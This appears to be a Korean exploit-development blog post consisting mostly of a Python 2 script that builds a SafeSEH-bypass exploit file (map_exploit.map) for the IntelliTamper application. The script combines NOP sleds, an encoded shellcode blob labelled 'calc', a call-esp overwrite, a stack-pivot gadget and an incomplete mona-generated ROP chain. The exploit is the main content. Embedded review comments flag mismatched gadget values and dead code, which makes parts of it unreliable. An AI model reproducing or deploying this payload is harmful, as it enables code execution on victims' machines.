intellitamper SAFE SEH Bypass Exploit


후.... 이때까지는 SEH Handler 뒤에서 처리했는데 이번엔 스택 피벗을 앞에서 조정해서 하는 문제였다.. 에고 어렵다..
친구가 힌트 안줬으면 계속 헤맸을 것 같다.

#-*-encoding:utf-8-*-


import struct

import sys

#seh

seh_next = struct.pack('<L',0x5D09A561) # call esp  -- packed little-endian; used as the nSEH slot in the payload below

# 0x5D109C6F      jmp esp
# NOTE(review): this comment and the one on the next line describe the same
# address differently (jmp esp vs. POP EBP # POP EBP # RETN). seh_handler is
# only referenced in a commented-out tail of the payload, so it never ends up
# in the written file.

seh_handler = struct.pack('<L',0x5D109C6F) # POP EBP # POP EBP # RETN


#calc
# Shellcode blob the author labels "calc". 38 lines of 13 bytes plus one
# final 8-byte line = 502 bytes; the payload arithmetic later subtracts 502
# for it. This is a Python 2 str, so each "\xNN" escape is one raw byte.

#buf

buf =  ""

buf += "\x89\xe2\xda\xc3\xd9\x72\xf4\x5e\x56\x59\x49\x49\x49"

buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"

buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"

buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"

buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4f\x4e\x68\x58\x49"

buf += "\x67\x59\x34\x58\x38\x6a\x7a\x49\x4b\x78\x59\x42\x54"

buf += "\x55\x74\x6c\x34\x66\x38\x65\x63\x6b\x79\x6c\x71\x34"

buf += "\x71\x4f\x73\x79\x50\x66\x64\x55\x61\x30\x70\x34\x4f"

buf += "\x54\x43\x62\x50\x78\x57\x72\x35\x42\x71\x67\x34\x34"

buf += "\x4f\x33\x6b\x4c\x5a\x38\x35\x78\x4f\x35\x6c\x52\x32"

buf += "\x76\x30\x49\x6e\x51\x6c\x37\x30\x56\x70\x32\x70\x70"

buf += "\x4d\x43\x32\x62\x54\x31\x4c\x37\x56\x43\x76\x50\x6d"

buf += "\x68\x57\x73\x7a\x50\x4f\x4f\x72\x52\x70\x59\x70\x6d"

buf += "\x79\x4c\x6d\x75\x31\x32\x79\x6b\x39\x4e\x4c\x68\x61"

buf += "\x39\x30\x39\x4e\x36\x6e\x48\x58\x73\x5a\x37\x63\x50"

buf += "\x4e\x37\x6d\x6f\x66\x4b\x6e\x46\x62\x48\x76\x69\x4c"

buf += "\x52\x6d\x38\x33\x33\x43\x6e\x48\x50\x4d\x47\x48\x6a"

buf += "\x6f\x67\x4c\x49\x46\x39\x4d\x4e\x67\x75\x6f\x6a\x57"

buf += "\x64\x33\x6f\x6c\x36\x79\x69\x47\x33\x42\x51\x61\x47"

buf += "\x62\x43\x6e\x72\x4d\x6a\x36\x77\x6f\x75\x78\x45\x56"

buf += "\x72\x4c\x48\x6b\x6e\x4b\x5a\x6e\x4d\x6d\x75\x44\x56"

buf += "\x67\x54\x6f\x70\x72\x7a\x47\x36\x39\x34\x37\x4f\x44"

buf += "\x62\x38\x74\x6c\x6d\x51\x48\x47\x39\x35\x54\x77\x31"

buf += "\x46\x6f\x4a\x31\x61\x6f\x4d\x30\x4d\x47\x6c\x48\x71"

buf += "\x42\x45\x6f\x5a\x4f\x6d\x69\x46\x4c\x30\x65\x69\x4c"

buf += "\x51\x5a\x33\x54\x37\x71\x75\x4e\x55\x56\x42\x43\x6b"

buf += "\x65\x4d\x6a\x61\x4e\x4f\x31\x4a\x4b\x42\x47\x30\x4a"

buf += "\x4b\x62\x58\x49\x46\x73\x39\x4c\x6f\x39\x71\x50\x4f"

buf += "\x4b\x47\x35\x4e\x37\x6d\x6e\x6f\x43\x68\x6b\x4e\x4f"

buf += "\x4b\x39\x4b\x33\x44\x4a\x4b\x58\x31\x4e\x61\x32\x32"

buf += "\x59\x7a\x77\x34\x6d\x6c\x66\x30\x5a\x4c\x33\x66\x6f"

buf += "\x4f\x7a\x64\x6d\x55\x53\x57\x64\x74\x6c\x4b\x5a\x72"

buf += "\x73\x47\x6d\x4f\x4b\x58\x34\x6d\x50\x32\x6e\x62\x76"

buf += "\x38\x6f\x56\x6f\x6b\x56\x36\x6e\x39\x4e\x4b\x45\x4b"

buf += "\x6e\x6d\x77\x6d\x78\x52\x4f\x6f\x71\x34\x49\x4d\x71"

buf += "\x31\x6d\x6f\x30\x4c\x4a\x78\x70\x6e\x46\x67\x4d\x6c"

buf += "\x6c\x50\x69\x6f\x49\x72\x49\x52\x53\x37\x69\x6f\x54"

buf += "\x66\x49\x31\x4b\x76\x4d\x43\x4c\x6b\x56\x68\x42\x4d"

buf += "\x76\x74\x33\x79\x76\x35\x41\x41"


#pattern = "just use mona for this"  (cyclic pattern used to find the offset; left commented out)


#print len(pattern)

print len(buf)  # Python 2 print statement; prints 502 for the blob above

def create_rop_chain():
    """Return the mona.py-generated ROP chain as one packed byte string.

    The chain is pasted verbatim from mona.py output and is incomplete:
    mona reported that it could not find a gadget to clear EDX, a PUSHAD
    gadget, or a pointer to 'jmp esp', so those slots are left as
    0x00000000 placeholders (see the trailing comments). The module-level
    code assigns the result to rop_chain, but the final payload written to
    disk does not include it, so this function is effectively dead code in
    this script.

    Returns:
        str (Python 2 bytes): concatenated little-endian DWORDs.
    """


    # rop chain generated with mona.py - www.corelan.be
    # NOTE(review): the entries mix two address ranges (0x5D09xxxx and
    # 0x004xxxxx), both tagged [intellitamper.exe]; which base is correct
    # for the target build cannot be told from this file.

    rop_gadgets = ""

    rop_gadgets += struct.pack('<L',0x5D0913B4)  # POP ESI # RETN [intellitamper.exe] 

    rop_gadgets += struct.pack('<L',0x41414141)  # ESI FILLER

    rop_gadgets += struct.pack('<L',0x5D09398C)  # POP EBX # RETN [intellitamper.exe] 

    rop_gadgets += struct.pack('<L',0x00000201)  # 0x00000201-> ebx

    rop_gadgets += struct.pack('<L',0x5D09398C)  # POP EBX # RETN [intellitamper.exe] 

    rop_gadgets += struct.pack('<L',0x00000040)  # 0x00000040-> ebx

    #rop_gadgets += struct.pack('<L',0x00000000)  # [-] Unable to find a gadget to clear edx

    rop_gadgets += struct.pack('<L',0x004183fe)  # ADD EDX,EBX # POP EBX # RETN 0x10 [intellitamper.exe] 

    rop_gadgets += struct.pack('<L',0x41414141)  # Filler (compensate)

    rop_gadgets += struct.pack('<L',0x41414141)  # Filler (RETN offset compensation)

    rop_gadgets += struct.pack('<L',0x41414141)  # Filler (RETN offset compensation)

    rop_gadgets += struct.pack('<L',0x41414141)  # Filler (RETN offset compensation)

    rop_gadgets += struct.pack('<L',0x41414141)  # Filler (RETN offset compensation)

    rop_gadgets += struct.pack('<L',0x5D09389B)  # POP ECX # RETN [intellitamper.exe] 

    rop_gadgets += struct.pack('<L',0x5D102000)  # &Writable location [intellitamper.exe]

    rop_gadgets += struct.pack('<L',0x5D)  # POP EDI # RETN [intellitamper.exe]  -- NOTE(review): packs only 0x0000005D, which does not match the gadget described in this comment

    rop_gadgets += struct.pack('<L',0x0040ec02)  # RETN (ROP NOP) [intellitamper.exe]

    rop_gadgets += struct.pack('<L',0x00402799)  # POP ESI # RETN [intellitamper.exe] 

    rop_gadgets += struct.pack('<L',0x004176fc)  # JMP [EAX] [intellitamper.exe]

    rop_gadgets += struct.pack('<L',0x0041d0f3)  # POP EAX # RETN [intellitamper.exe] 

    rop_gadgets += struct.pack('<L',0x77c11120)  # ptr to &VirtualProtect() (skipped module criteria, check if pointer is reliable !) [IAT msvcrt.dll]

    rop_gadgets += struct.pack('<L',0x00000000)  # [-] Unable to find pushad gadget

    rop_gadgets += struct.pack('<L',0x00000000)  # <- Unable to find ptr to 'jmp esp'

    return rop_gadgets


rop_chain = create_rop_chain()  # built here but never part of `payload` below


esp_move = struct.pack('<L',0x5D0F0C94)  # only referenced by the commented-out lines below

# 0x00412874 : {pivot 528 / 0x210} :  # POP ESI # POP EBP # POP EBX # ADD ESP,204 # RETN -> 

#stack_pivot = struct.pack('<L',0x00412874) # stack pivot  == jmp

# 0x00413acc : {pivot 9780 / 0x2634} :  # ADD ESP,2634 # RETN 

stack_pivot = struct.pack('<L',0x413acc) # ADD ESP, 2634  (same address as 0x00413acc in the comment above; leading zeros are irrelevant to struct.pack)

#stack_pivot += struct.pack('<L',0x5D09A561)

#stack_pivot += (esp_move)*72

# 11152


# ADD ESP,1

# 83 C4 01 00 -> 00 01 C4 83

# first nop : 516

# 10632 - 7164

# 3468 - 12 = 3456 - 502 

#payload = "\x90"*516 + "\x90"*7160 + "B"*12 + struct.pack('<L',0x5D09A561) * 12 +buf + "A"*(2948) + seh_next + struct.pack('<L',0x5D09A561)  + stack_pivot + "\x90"*80 + buf + "x90"*20000

#payload = "A"*(11156-4)

                #seh_next -> use CALL ESP

# 11152 - 7680 = 3472

# Layout by the literal lengths in the expression (buf is 502 bytes):
#   3472 "A" + 3702 NOP + buf(502) + seh_next(4)          -> 7680 bytes
#   + 2970 NOP + buf(502) + seh_next(4)                    -> 11156 bytes
#   + stack_pivot(4)                                       -> 11160 bytes
# The "+ seh_next + seh_handler" tail is commented out, so seh_handler is
# never written. Every control-transfer value is a hard-coded absolute
# address, so this file is specific to one target build loaded at a fixed
# base; an ASLR-relocated image or a SafeSEH-validated handler table would
# not accept these values (general mitigation behaviour, not verified here).
payload = "A"*(11152-7680) + "\x90" * (4204-502) + buf + seh_next + "\x90"*(3472-502) + buf + seh_next +stack_pivot#+ seh_next + seh_handler 


# Writes map_exploit.map into the current working directory. The [:20000]
# slice is a no-op here: payload is 11160 bytes, well under 20000. Python 2
# style open/close rather than a `with` block.
f = open('map_exploit.map','wb')

f.write(payload[:20000])

f.close()


